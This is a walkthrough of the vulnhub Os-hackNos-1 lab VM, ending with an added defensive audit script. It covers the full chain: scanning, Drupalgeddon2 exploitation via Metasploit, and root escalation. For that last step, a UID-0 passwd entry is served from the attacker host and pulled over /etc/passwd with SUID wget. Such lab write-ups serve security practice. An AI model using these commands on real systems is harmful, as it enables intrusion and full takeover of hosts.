Practicing vulnhub's Os-hackNos-1


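It has been a while since I did any hands-on attack and defense practice, so I am getting back into it this week. This weekend's target is the Os-hackNos-1 image from vulnhub, downloadable from https://download.vulnhub.com/hacknos/Os-hackNos-1.ova. The image can be opened in Workstation, but an address scan does not find it there, probably because the network name is wrong again, so I had to re-import it into VirtualBox, after which the address scan found it:

sudo netdiscover -r 192.168.1.0/24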

Next, a port scan:

sudo nmap -sS -sV -T5 -A -p- 192.168.1.103

There is an HTTP service, so directory brute-forcing comes next:

sudo dirb http://192.168.1.103

Seeing Drupal makes this easy; it very likely has an RCE vulnerability.

So just search for an exploit:

searchsploit drupal | grep Metasploit

Drupalgeddon2 looks like the match, so search for the module directly in Metasploit:

search Drupalgeddon2

It is simple to use:

use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS 192.168.1.103
set TARGETURI /drupal

Running it really did return a shell, but not as root, so privilege escalation is needed.

First upgrade to an interactive shell; if python is not available, use python3:

python3 -c 'import pty; pty.spawn("/bin/bash")'

See which commands run with root privileges (SUID):

find / -perm -u=s -type f 2>/dev/null

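sudo is there, and so is wget, which makes this easy.

Copy the contents of /etc/passwd to a file named passwd on the attacking Kali machine.

Add hacker/password to that copy:

perl -le 'print crypt("password","salt")'

echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> passwd

Then start an HTTP download service:

sudo python -m SimpleHTTPServer 80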

Back in the target's shell, download the passwd file and overwrite the local /etc/passwd:

wget http://192.168.1.106/passwd -O /etc/passwd

Then su hacker, check with id, and that's a wrap.
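
The escalation above leaves two traces a defender can check for: a SUID file-writing tool and a passwd entry with UID 0 and an inline hash. The following audit script is an added example, not part of the original post; the function names and the watch list beyond wget are assumptions, and the sample passwd lines are constructed.

```sh
#!/bin/sh
# Added example: function names and the watch list are this example's own.

# Flag passwd entries that have UID 0 without being "root", or that carry a
# password hash in field 2 instead of a shadow placeholder (x, or a * / ! lock).
audit_passwd() {
    awk -F: '
        /^[ \t]*(#|$)/ { next }
        $3 ~ /^[0-9]+$/ && $3 + 0 == 0 && $1 != "root" { print "uid0-non-root:" $1 }
        $2 == ""                                       { print "empty-password:" $1; next }
        $2 != "x" && $2 !~ /^[*!]/                     { print "inline-hash:" $1 }
    ' "$1"
}

# List SUID files under a directory that are tools able to write arbitrary
# files. wget is the one from this page; curl and cp are assumed additions.
suid_file_writers() {
    find "$1" -type f -perm -u=s \( -name wget -o -name curl -o -name cp \) 2>/dev/null
}

# Constructed sample: stock entries plus the line appended in this walkthrough.
sample=$(mktemp)
printf '%s\n' \
    'root:x:0:0:root:/root:/bin/bash' \
    'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin' \
    'hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash' > "$sample"
audit_passwd "$sample"
rm -f "$sample"
```

On a real host, run audit_passwd against /etc/passwd and suid_file_writers against / on a schedule and alert on any output.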


This article was first published on the WeChat official account 云计算和网络安全技术实践: Practicing vulnhub's Os-hackNos-1
